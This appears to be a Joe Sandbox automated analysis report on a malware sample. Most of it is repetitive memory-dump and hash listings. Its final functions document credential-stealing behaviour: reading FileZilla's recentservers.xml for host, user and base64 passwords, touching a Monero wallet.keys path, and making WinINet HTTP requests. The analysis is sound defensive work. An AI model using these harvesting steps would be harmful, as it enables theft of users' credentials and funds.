                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2O|
                                • API String ID: 0-1779813692
                                • Opcode ID: c2ca7ab94b7ca8c63032a9e6c8cc7a3783245fad8a27454cb31985543e2ae72e
                                • Instruction ID: 25df46dfa144a44589700fe0c6fa855d51012908b3a42f6c10964e008c7f1089
                                • Opcode Fuzzy Hash: c2ca7ab94b7ca8c63032a9e6c8cc7a3783245fad8a27454cb31985543e2ae72e
                                • Instruction Fuzzy Hash: 794177F3A19208ABF3085939EC45777B7CAD7D4320F2A423EEA59D7384EC759C064194
                                Function 00F4A701 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 5P
                                • API String ID: 0-607277257
                                • Opcode ID: 5e81c5862f313f1d7d83b9bbc9df777cdede8fb4ad44bec4aa36e3e451e42c57
                                • Instruction ID: 8bd782e5a934702efb2b9ac03531e2a383ada8cdc4fae58fd262fa788ff4e76a
                                • Opcode Fuzzy Hash: 5e81c5862f313f1d7d83b9bbc9df777cdede8fb4ad44bec4aa36e3e451e42c57
                                • Instruction Fuzzy Hash: DE41F2B358C700DFE3046E29D88077AFFE4EB94710F26493DDAC246704E6351881A687
                                Function 00E2FFAD Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "/
                                • API String ID: 0-2465596502
                                • Opcode ID: 32bce0da29250b1edf5853fde0fca586422bc575ef39ef93c39ea761e4f0f1fd
                                • Instruction ID: 03df2a5ea82d363cc21b7466d4859217a93656b5b7f36cb0f684c8943aec7112
                                • Opcode Fuzzy Hash: 32bce0da29250b1edf5853fde0fca586422bc575ef39ef93c39ea761e4f0f1fd
                                • Instruction Fuzzy Hash: 01316DF3A082049FE304BA39EC8537BF7D5EBE4210F1A463DDA95C3784F97958068246
                                Function 00E7ABB5 Relevance: .2, Instructions: 226COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e63e96ad35b3aa1c0abcf20c580146f7cfec02203b2631de000d26331bbca26e
                                • Instruction ID: da5f5b7b8bb5796392107d082bbc48a04b8a66ad3ceeb6053eaf2f1b205a866e
                                • Opcode Fuzzy Hash: e63e96ad35b3aa1c0abcf20c580146f7cfec02203b2631de000d26331bbca26e
                                • Instruction Fuzzy Hash: C27191F3E086149FE3006E28DC8576ABBE5EF94320F1A863DDAC897744E67558458783
                                Function 00E1C940 Relevance: .2, Instructions: 195COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f1775cd137ba77fcda63fa65fd65cffcf950615b604b2a8d3699c789a8a1a41
                                • Instruction ID: 75cf3e78127dd1726eaf7b4041fe586392a9f126f32b5ddc0d1d8fc02a76dc76
                                • Opcode Fuzzy Hash: 2f1775cd137ba77fcda63fa65fd65cffcf950615b604b2a8d3699c789a8a1a41
                                • Instruction Fuzzy Hash: F85125B3A087109BE304DE2AEC4453BF7E9EFD0620F2A863DE5C587340EA349C058652
                                Function 00FBA37A Relevance: .2, Instructions: 157COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f3a45a38238214aaef0f5cc59ae94ffea3a76734eb8530b42cfb96fd83278bcd
                                • Instruction ID: eb8ca2a7b4c52219a216a61c1884abeaf8d6699eb61a88def35140971728af15
                                • Opcode Fuzzy Hash: f3a45a38238214aaef0f5cc59ae94ffea3a76734eb8530b42cfb96fd83278bcd
                                • Instruction Fuzzy Hash: 25414BF3908204AFE7056E59ECD1B7AF7E5FB68720F19053DEAC183700E57558118693
                                Function 00E474CA Relevance: .2, Instructions: 153COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d84fb13a34bccb3ffc0fa309f4f8212d2fd11f445e48bcc341a9b5d96573722
                                • Instruction ID: 75bdc613e043659c7944a870793854d5fab2939475e2c75c752ecf48274edc7d
                                • Opcode Fuzzy Hash: 0d84fb13a34bccb3ffc0fa309f4f8212d2fd11f445e48bcc341a9b5d96573722
                                • Instruction Fuzzy Hash: 4041C4F3A081005BE344AE2DDC45B2AB7EAEBD4315F1B853DDAC4C7788E93498068697
                                Function 00E26BEE Relevance: .2, Instructions: 150COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7399cf23c0de40e677fe88cc7bba56866c709632d609ee8f699ee9c0a5096a2
                                • Instruction ID: 6ff203abce3c04efb8b2619e57ef1f39e23c71ae7a0e293df3bfdc3c8b0c6def
                                • Opcode Fuzzy Hash: b7399cf23c0de40e677fe88cc7bba56866c709632d609ee8f699ee9c0a5096a2
                                • Instruction Fuzzy Hash: 9241E4F3E186149BE7146A29EC9677AB7E9DF94310F0B053DDB85D3384E939980086CA
                                Function 00B89750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00B80250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00B90DBA,00B90DB7,00B90DB6,00B90DB3), ref: 00B80362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B80369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00B80385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00B803CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B803DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00B80419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B80463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B8051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B8054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00B80562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00B80571
                                • lstrcat.KERNEL32(?,url: ), ref: 00B80580
                                • lstrcat.KERNEL32(?,00000000), ref: 00B80593
                                • lstrcat.KERNEL32(?,00B91678), ref: 00B805A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00B805B5
                                • lstrcat.KERNEL32(?,00B9167C), ref: 00B805C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00B805D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00B805E6
                                • lstrcat.KERNEL32(?,00B91688), ref: 00B805F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00B80604
                                • lstrcat.KERNEL32(?,00000000), ref: 00B80617
                                • lstrcat.KERNEL32(?,00B91698), ref: 00B80626
                                • lstrcat.KERNEL32(?,00B9169C), ref: 00B80635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B8068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 96f9abc29e0d622ceb4e353ba6fa53ae625e38470caeabc171c2c3da76a204b3
                                • Instruction ID: cee19ad2ba60704a77a503c48b1f52fc7624cf3ee91bf1b472f7c9a76990c085
                                • Opcode Fuzzy Hash: 96f9abc29e0d622ceb4e353ba6fa53ae625e38470caeabc171c2c3da76a204b3
                                • Instruction Fuzzy Hash: 13D11E75910208EBDB04FBF4DD96EEE73B8AF14300F5445A9F502A61A1DE38AA06DB71
                                Function 00B75960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                  • Part of subcall function 00B747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B759F8
                                • StrCmpCA.SHLWAPI(?,0093E310), ref: 00B75A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B75B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0093E2C0,00000000,?,0093A098,00000000,?,00B91A1C), ref: 00B75E71
                                • lstrlen.KERNEL32(00000000), ref: 00B75E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00B75E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B75E9A
                                • lstrlen.KERNEL32(00000000), ref: 00B75EAF
                                • lstrlen.KERNEL32(00000000), ref: 00B75ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B75EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00B75F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B75F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B75F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00B75FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00B75FBD
                                • HttpOpenRequestA.WININET(00000000,0093E210,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B75BF8
